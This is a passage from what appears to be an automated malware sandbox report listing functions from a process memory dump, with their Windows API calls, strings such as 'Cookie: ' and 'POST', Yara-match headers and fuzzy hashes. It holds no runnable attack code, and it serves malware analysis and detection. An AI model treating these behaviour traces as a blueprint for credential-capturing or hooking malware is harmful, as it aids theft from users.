                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CloseCreateHandleModuleNamePointerRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1352878660-0
                                                                                                                                        • Opcode ID: 5be168baa1c7d596057ddd0ea3bca6ce3ee599e3fd8da44b0e6d839888664f52
                                                                                                                                        • Instruction ID: 2a771c216a863dc5204b6bfb14094595c971ba31831f9d62948e31006c17b74b
                                                                                                                                        • Opcode Fuzzy Hash: 5be168baa1c7d596057ddd0ea3bca6ce3ee599e3fd8da44b0e6d839888664f52
                                                                                                                                        • Instruction Fuzzy Hash: FC118BB1A00118FAEB21AB66CC89EEFBE6CEF01754F244126F905E1150D7748E44CBA9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00445528, Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(?,?,?,?,004440F5), ref: 00445560
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • lstrcpy.KERNEL32(00000000,?), ref: 00445577
                                                                                                                                        • StrChrA.SHLWAPI(00000000,0000002E,?,?,004440F5), ref: 00445580
                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,004440F5), ref: 0044559E
                                                                                                                                          • Part of subcall function 004479AD: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,?,00000000,004440F5,00000000,?,00000000,?,0046A568,0000001C,0045E36B,00000002), ref: 00447A84
                                                                                                                                          • Part of subcall function 004479AD: VirtualProtect.KERNELBASE(?,00000004,?,?,00000000,004440F5,00000000,?,00000000,?,0046A568,0000001C,0045E36B,00000002,00000000,00000001), ref: 00447A9F
                                                                                                                                          • Part of subcall function 004479AD: RtlEnterCriticalSection.NTDLL(0046E240), ref: 00447AC3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 105881616-0
                                                                                                                                        • Opcode ID: daeaf893c1463d960d62474b5549ca06d3240d5e4bab7d85c732d549d0f6d523
                                                                                                                                        • Instruction ID: e2f04f5c8d73c8d8d38c5eb177b466c1715bae6f8b1329abef860be0731b8a5b
                                                                                                                                        • Opcode Fuzzy Hash: daeaf893c1463d960d62474b5549ca06d3240d5e4bab7d85c732d549d0f6d523
                                                                                                                                        • Instruction Fuzzy Hash: 5D216A70A00604EFEF10DF65C848BBEBBFABF44304F15845AE40697262DBB8EA45CB55
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00444663, Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0044467E
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004446A2
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004446FA
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?), ref: 004446CB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: QueryValue$AllocateCloseHeapOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 453107315-0
                                                                                                                                        • Opcode ID: 7e156033a476afe57cfbaf16438934c6b9079c12dfad7bbf394087b29b916a79
                                                                                                                                        • Instruction ID: 3f0a72353a9f0a0157dcbc7eed7bb8632a2ecf817d54118ff968898c82b0ea9b
                                                                                                                                        • Opcode Fuzzy Hash: 7e156033a476afe57cfbaf16438934c6b9079c12dfad7bbf394087b29b916a79
                                                                                                                                        • Instruction Fuzzy Hash: 0721D6B5900108FFDB11DF99CC849EEBBB9EB89344F218066F801A6211E7759E51DB64
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045CF0D, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00459A37,?,?,00444403,?,03BD8D60), ref: 0045CF18
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 0045CF30
                                                                                                                                        • memcpy.NTDLL(00000000,?,-00000008,?,?,?,00459A37,?,?,00444403,?,03BD8D60), ref: 0045CF74
                                                                                                                                        • memcpy.NTDLL(00000001,?,00000001), ref: 0045CF95
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1819133394-0
                                                                                                                                        • Opcode ID: 1591ccf98deab8a461a63aaa73f5f893cd9fbfdb15b615dc0ea628de60824df5
                                                                                                                                        • Instruction ID: e79fae3776bf3fa404a8d1fb701ab9db5d7b8203ca5679eb7f2ccde06da281b0
                                                                                                                                        • Opcode Fuzzy Hash: 1591ccf98deab8a461a63aaa73f5f893cd9fbfdb15b615dc0ea628de60824df5
                                                                                                                                        • Instruction Fuzzy Hash: ED112C72A00214BFC7108B6ADCC4E5F7BEEDB90361F05017AF905D7291EAB49E058755
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004427F6, Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • StrChrA.SHLWAPI(?,?), ref: 0044281C
                                                                                                                                        • StrTrimA.SHLWAPI(?,0046A48C,00000001), ref: 0044283B
                                                                                                                                        • StrChrA.SHLWAPI(?,?), ref: 0044284C
                                                                                                                                        • StrTrimA.SHLWAPI(00000001,0046A48C), ref: 0044285E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Trim
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3043112668-0
                                                                                                                                        • Opcode ID: e7b86e57125d87eb2d6faa0e0b5b7b485def2331db65ff7c1d9faa5695a5af81
                                                                                                                                        • Instruction ID: 97d2850ca7791483df1fc7befa9d0c41ca1dfdc097c7764cf796f8f7c44afe85
                                                                                                                                        • Opcode Fuzzy Hash: e7b86e57125d87eb2d6faa0e0b5b7b485def2331db65ff7c1d9faa5695a5af81
                                                                                                                                        • Instruction Fuzzy Hash: E5118F75600209BBDB00AF59C984FAF7FB8EF85791F10811AFC059B241EAB8DA40CB65
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00443488, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 58memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004509D0: RtlAllocateHeap.NTDLL(00000000,?), ref: 004509FF
                                                                                                                                          • Part of subcall function 004509D0: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,00443498,?), ref: 00450A22
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?), ref: 004434C2
                                                                                                                                          • Part of subcall function 0045F820: lstrlen.KERNEL32(?,00000000,00000000,74B05520), ref: 0045F837
                                                                                                                                          • Part of subcall function 0045F820: lstrlen.KERNEL32(?), ref: 0045F83F
                                                                                                                                          • Part of subcall function 0045F820: lstrlen.KERNEL32(?), ref: 0045F8AA
                                                                                                                                          • Part of subcall function 0045F820: RtlAllocateHeap.NTDLL(00000000,?), ref: 0045F8D5
                                                                                                                                          • Part of subcall function 0045F820: memcpy.NTDLL(00000000,00000002,?), ref: 0045F8E6
                                                                                                                                          • Part of subcall function 0045F820: memcpy.NTDLL(00000000,?,?), ref: 0045F8FC
                                                                                                                                          • Part of subcall function 0045F820: memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 0045F90E
                                                                                                                                          • Part of subcall function 0045F820: memcpy.NTDLL(00000000,004683E4,00000002,00000000,?,?,00000000,?,?), ref: 0045F921
                                                                                                                                          • Part of subcall function 0045F820: memcpy.NTDLL(00000000,?,00000002), ref: 0045F936
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000001), ref: 0044350E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heapmemcpy$Freelstrlen$Allocate
                                                                                                                                        • String ID: Cookie: $https://
                                                                                                                                        • API String ID: 2465664858-1563071917
                                                                                                                                        • Opcode ID: bae47196d0d4838d189b386b04cbac791c613677315543e5f2dd0e2e56ee7d5c
                                                                                                                                        • Instruction ID: 9f31f42358ff3565c15a265216023eb02efd74817a66933f4f3fcdf330961caf
                                                                                                                                        • Opcode Fuzzy Hash: bae47196d0d4838d189b386b04cbac791c613677315543e5f2dd0e2e56ee7d5c
                                                                                                                                        • Instruction Fuzzy Hash: E701C432640254BBEB225F29DC40FAF3F68DB81B66F058126FC0897251D779EE04C6AD
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045F520, Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,?,00459B11,00000000,00000000), ref: 0045F53E
                                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,00459B11,00000000,00000000,00000000,00000000,0000001E,0000001E,?,?,?,0045ABD6,?,0000001E), ref: 0045F546
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharErrorLastMultiWide
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 203985260-0
                                                                                                                                        • Opcode ID: f0985d15c1d01418494542364d6c5ac4adaae09cedc0eaf8b36ac1fc2ac71e7c
                                                                                                                                        • Instruction ID: 553f3aacc8dcb9de0864916dad7997a9424335bcfe10ace4988858085481cffd
                                                                                                                                        • Opcode Fuzzy Hash: f0985d15c1d01418494542364d6c5ac4adaae09cedc0eaf8b36ac1fc2ac71e7c
                                                                                                                                        • Instruction Fuzzy Hash: FF01D8711082557F87319F264C48C2BBBACEBCA765B104B2EF86592282EA245C0DC677
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045B947, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 56COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,0044DB0E,?,00000000,?,0000EA60,00000008,0000EA60,00000000,?,?,0045F5E5,00000008,?), ref: 0045B96A
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,0044DB0E,?,00000000,?,0000EA60,00000008,0000EA60,00000000,?,?,0045F5E5,00000008,?), ref: 0045B9C6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast
                                                                                                                                        • String ID: +mF$5mF
                                                                                                                                        • API String ID: 1452528299-1897131304
                                                                                                                                        • Opcode ID: 2714173ab2a529a879f875df14696964c1fc3f6968d44cd3ec635647a07e5752
                                                                                                                                        • Instruction ID: 2641f30783e3354adf5bb65c84fa1daf3cfe102e591ed31531f62d6a69884738
                                                                                                                                        • Opcode Fuzzy Hash: 2714173ab2a529a879f875df14696964c1fc3f6968d44cd3ec635647a07e5752
                                                                                                                                        • Instruction Fuzzy Hash: 51115EB1500209EFDF10DF54DD44BAF7BB8EF04355F104426FA01E6151D7B49E189BAA
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00464A70, Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(?), ref: 00464A7D
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 00464AA3
                                                                                                                                        • lstrcpy.KERNEL32(00000014,?), ref: 00464AC8
                                                                                                                                        • memcpy.NTDLL(?,?,?), ref: 00464AD5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeaplstrcpylstrlenmemcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1388643974-0
                                                                                                                                        • Opcode ID: 97b2830d8c0a46aa10f805a822a925e40628eb402b85a8b4d73866851f5bbe51
                                                                                                                                        • Instruction ID: 2b75dec2c3177a447bd1d0f4c63d1b6efd8660be9b1b55eacf54c6b8f1d2971c
                                                                                                                                        • Opcode Fuzzy Hash: 97b2830d8c0a46aa10f805a822a925e40628eb402b85a8b4d73866851f5bbe51
                                                                                                                                        • Instruction Fuzzy Hash: 5211377550060AEFCB21CF58D884A9A7BF8EB48704F10856EF85987221E775E904DB95
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00444721, Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00444734
                                                                                                                                        • lstrlen.KERNEL32(03BD8BC0), ref: 00444755
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 0044476D
                                                                                                                                        • lstrcpy.KERNEL32(00000000,03BD8BC0), ref: 0044477F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1929783139-0
                                                                                                                                        • Opcode ID: ddd2f0e738d68837ac3aa1fb8fdc462c81835234e064260185aad9f97d2afd88
                                                                                                                                        • Instruction ID: 4c18bf96f4998cd641b42ccbaa436662ca12368a82307053488e700b17a7b8d3
                                                                                                                                        • Opcode Fuzzy Hash: ddd2f0e738d68837ac3aa1fb8fdc462c81835234e064260185aad9f97d2afd88
                                                                                                                                        • Instruction Fuzzy Hash: 96010872A00344ABD7119BA9AC88F5F7BBCAB89301F100569E90AD3301EB749909C769
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00458936, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 53memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrcmpi.KERNEL32(?,POST), ref: 0045898D
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00450C92,00000000,00450C92,?), ref: 004589BA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeaplstrcmpi
                                                                                                                                        • String ID: POST$`F
                                                                                                                                        • API String ID: 3337503550-3695441687
                                                                                                                                        • Opcode ID: dd77979906000d674fd2a531589a2dccb84ea776144f5fe45a351b52e8be5f1b
                                                                                                                                        • Instruction ID: 5167bd3e6a0d961e88d330ede0c977c9b1587ec516c5c602b04d0c11bfa02387
                                                                                                                                        • Opcode Fuzzy Hash: dd77979906000d674fd2a531589a2dccb84ea776144f5fe45a351b52e8be5f1b
                                                                                                                                        • Instruction Fuzzy Hash: F1118270A01105ABCB20AF56DD05AAE7BA6BF41316F14403EEC01B6261EF74DD49CA8A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004637C2, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrcmpi.KERNEL32(?,Blocked), ref: 004637DE
                                                                                                                                        • lstrcmpi.KERNEL32(?,Main), ref: 00463813
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmpi
                                                                                                                                        • String ID: Blocked$Main
                                                                                                                                        • API String ID: 1586166983-1966386946
                                                                                                                                        • Opcode ID: ea6de2c27273dc3b127c7c6f33f00d2ee47782c636319d51fdfebae61c0d02b1
                                                                                                                                        • Instruction ID: 862527eb9df0ba85acf408749dacb75f1a913558d258e7245ae115503286526e
                                                                                                                                        • Opcode Fuzzy Hash: ea6de2c27273dc3b127c7c6f33f00d2ee47782c636319d51fdfebae61c0d02b1
                                                                                                                                        • Instruction Fuzzy Hash: A4019271200289AB9B01EF62DC80DBB37ADEF85755704442BFC0153212EBB9DD12DBBA
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004447AA, Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 004447BC
                                                                                                                                          • Part of subcall function 0044178F: CreateFileW.KERNEL32(?,C0000000,?,00000000,?,00000080,00000000), ref: 004417D0
                                                                                                                                          • Part of subcall function 0044178F: GetLastError.KERNEL32 ref: 004417DA
                                                                                                                                          • Part of subcall function 0044178F: WaitForSingleObject.KERNEL32(000000C8), ref: 004417FF
                                                                                                                                          • Part of subcall function 0044178F: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00441820
                                                                                                                                          • Part of subcall function 0044178F: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00441848
                                                                                                                                          • Part of subcall function 0044178F: WriteFile.KERNEL32(?,00001388,?,00000002,00000000), ref: 0044185D
                                                                                                                                          • Part of subcall function 0044178F: SetEndOfFile.KERNEL32(?), ref: 0044186A
                                                                                                                                          • Part of subcall function 0044178F: CloseHandle.KERNEL32(?), ref: 00441882
                                                                                                                                        • WaitForSingleObject.KERNEL32(00002710,?,00462CA4,.dll,00000000,00001000,00000000,00000000,?), ref: 004447DF
                                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,00462CA4,.dll,00000000,00001000,00000000,00000000,?), ref: 00444801
                                                                                                                                        • GetLastError.KERNEL32(?,00462CA4,.dll,00000000,00001000,00000000,00000000,?), ref: 00444815
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3370347312-0
                                                                                                                                        • Opcode ID: 0f998f83147512ee32733a5a0d49be6018f7f4bd67d1abc7990726ba8ddf059c
                                                                                                                                        • Instruction ID: bbbc0b135fb7b7e2a13e02bdf29b5bc3d2b2bd050ab20c697866c6f11fd4c098
                                                                                                                                        • Opcode Fuzzy Hash: 0f998f83147512ee32733a5a0d49be6018f7f4bd67d1abc7990726ba8ddf059c
                                                                                                                                        • Instruction Fuzzy Hash: CCF0C235240204FBEB212F609C09F9E3B26AF45711F10892AFB06E51F1EBB594619B6F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00462DC9, Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000012B,0044BD3B,000000FF,03BD8900,?,?,0044E94A,0000012B,03BD8900), ref: 00462DE5
                                                                                                                                        • GetLastError.KERNEL32(?,?,0044E94A,0000012B,03BD8900,?,?,00461E90,00000000,?), ref: 00462DF0
                                                                                                                                        • WaitNamedPipeA.KERNEL32(00002710), ref: 00462E12
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,?,?,0044E94A,0000012B,03BD8900,?,?,00461E90,00000000,?), ref: 00462E20
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4211439915-0
                                                                                                                                        • Opcode ID: 313902c24326e1441ec7f1b50f11d3366573b384b0edf839813da5f3f4b1f7f8
                                                                                                                                        • Instruction ID: 62e388cef827f56a8e0088032fdd3ca03d85040984b6897f5e91f7deaecfe789
                                                                                                                                        • Opcode Fuzzy Hash: 313902c24326e1441ec7f1b50f11d3366573b384b0edf839813da5f3f4b1f7f8
                                                                                                                                        • Instruction Fuzzy Hash: 44F0C232601520BBD2301B65EC4CB8B7B55EB153A2F114A35F609EA2E0E6F24C40C6AA
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044D57C, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 33stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(?,?,ss: *.*.*.*,00000000,0045380B,00000000,?,?,?,?,000000FF,?,00000F00), ref: 0044D585
                                                                                                                                        • memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,?,000000FF,?,00000F00), ref: 0044D5A8
                                                                                                                                        • memset.NTDLL ref: 0044D5B7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlenmemcpymemset
                                                                                                                                        • String ID: ss: *.*.*.*
                                                                                                                                        • API String ID: 4042389641-2676197480
                                                                                                                                        • Opcode ID: df3171190fdddb97b44a421865a89715484dc424cfbd1302033c83a6e323bd30
                                                                                                                                        • Instruction ID: b8e81cbf317c48a3244ff7e941e7e7c89c03e20362a3d99cb712bf364be1236d
                                                                                                                                        • Opcode Fuzzy Hash: df3171190fdddb97b44a421865a89715484dc424cfbd1302033c83a6e323bd30
                                                                                                                                        • Instruction Fuzzy Hash: 87E0E57390431167D6306AB69C88E4B3AADEBC8314B000A3BFD05D3205ED79C908C2B4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044BE4A, Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(03BD8D20), ref: 0044BE53
                                                                                                                                        • Sleep.KERNEL32(0000000A,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044BE5D
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044BE85
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(03BD8D20), ref: 0044BEA3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 58946197-0
                                                                                                                                        • Opcode ID: 04bc6f0d46faa179056d075fcad0bf3911ff900af44570a5b8365e75b7b5b13a
                                                                                                                                        • Instruction ID: 2d55e1c5d912c2f08a49faf50d15d875c6aed1529e51840336ad3e0ca35e2885
                                                                                                                                        • Opcode Fuzzy Hash: 04bc6f0d46faa179056d075fcad0bf3911ff900af44570a5b8365e75b7b5b13a
                                                                                                                                        • Instruction Fuzzy Hash: C6F05E70600640DBE7208F69DD89F873BA4EB11700F10882AF945D72A1EBB4EC41DB1F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045487D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • wcstombs.NTDLL ref: 0045494A
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,0000FFFF,?,?,?,?,00000000,00000000,?,?,0046E088,?,?,0044363D), ref: 00454966
                                                                                                                                          • Part of subcall function 0044966C: wcstombs.NTDLL ref: 0044972A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wcstombs$FreeHeap
                                                                                                                                        • String ID: |cF
                                                                                                                                        • API String ID: 2377541700-1942328551
                                                                                                                                        • Opcode ID: d3b1026177f3131d00ad962fa404b3d0f5ac4d6ba36d7d516dd43c1fbf3d9cc0
                                                                                                                                        • Instruction ID: 9ebf3630f1ff0382221a744e072f20ff76865ffd8a2c11dde79f9b2063108602
                                                                                                                                        • Opcode Fuzzy Hash: d3b1026177f3131d00ad962fa404b3d0f5ac4d6ba36d7d516dd43c1fbf3d9cc0
                                                                                                                                        • Instruction Fuzzy Hash: 6F3180B1500219EFCF219FA1C845A9F7B65FF8475AF10801AFD144A212C33999A8DF99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00457409, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(0046E240), ref: 004574A6
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(0046E240), ref: 004574C4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                        • String ID: 8F
                                                                                                                                        • API String ID: 3168844106-3652835401
                                                                                                                                        • Opcode ID: 9cbcc7684469f7586aa8f9aaa7a71862c9f6dca8c14f4e55b57e0cb45352416e
                                                                                                                                        • Instruction ID: 96b5751415b5d00cec8737c22f6f29174a676d04d238046b95c618f895505d52
                                                                                                                                        • Opcode Fuzzy Hash: 9cbcc7684469f7586aa8f9aaa7a71862c9f6dca8c14f4e55b57e0cb45352416e
                                                                                                                                        • Instruction Fuzzy Hash: 9F3180B0900605EFCB10DF96D8449ADBBF4FF08304B10853FE515A7261E738AA45CF9A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00458783, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73synchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • WaitForSingleObject.KERNEL32(000001F4,?,?,?,?,00449D9E,?), ref: 00458809
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ObjectSingleWait
                                                                                                                                        • String ID: $7gF
                                                                                                                                        • API String ID: 24740636-386812976
